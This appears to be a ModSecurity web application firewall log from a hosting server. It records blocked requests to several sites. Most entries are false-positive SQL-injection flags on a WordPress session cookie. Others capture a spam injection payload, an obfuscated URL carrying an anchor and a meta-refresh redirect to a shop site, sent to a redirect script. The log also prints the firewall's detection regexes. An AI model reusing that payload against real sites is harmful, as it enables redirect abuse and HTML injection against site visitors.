[Mon May 11 18:34:00.439919 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.440452 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.441011 2026] [security2:error] [pid 1416109:tid 1416142] [client 27.78.84.116:56017] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE-FV4kyjgo4bQBUiBZAAAAMw"]
[Mon May 11 18:34:00.631239 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE-EWKUxpmnkK7zHysMQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:00.778533 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE-EWKUxpmnkK7zHysMwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:00.778807 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE-EWKUxpmnkK7zHysMwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:01.137970 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE-EWKUxpmnkK7zHysMwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:01.521674 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE-UWKUxpmnkK7zHysNQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:01.521958 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE-UWKUxpmnkK7zHysNQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:02.161262 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE-UWKUxpmnkK7zHysNQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:02.437675 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE-kWKUxpmnkK7zHysNwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:02.437958 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE-kWKUxpmnkK7zHysNwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:03.095045 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE-kWKUxpmnkK7zHysNwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:03.374868 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE-0WKUxpmnkK7zHysOAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:03.375191 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE-0WKUxpmnkK7zHysOAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:03.975305 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE-0WKUxpmnkK7zHysOAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:04.287766 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE_EWKUxpmnkK7zHysOgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:04.288067 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE_EWKUxpmnkK7zHysOgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:04.905790 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.907872 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.908255 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.908378 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.908590 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.909080 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.909449 2026] [security2:error] [pid 1411055:tid 1411063] [client 27.78.84.116:56423] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIE_EWKUxpmnkK7zHysOwAAAQY"]
[Mon May 11 18:34:04.916363 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE_EWKUxpmnkK7zHysOgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:05.043785 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE_UWKUxpmnkK7zHysPAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:05.044217 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE_UWKUxpmnkK7zHysPAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:05.651364 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE_UWKUxpmnkK7zHysPAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:05.754286 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE_UWKUxpmnkK7zHysPQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:05.754708 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE_UWKUxpmnkK7zHysPQAAARM"], referer: https://rentparadise.fr/wp-login.php
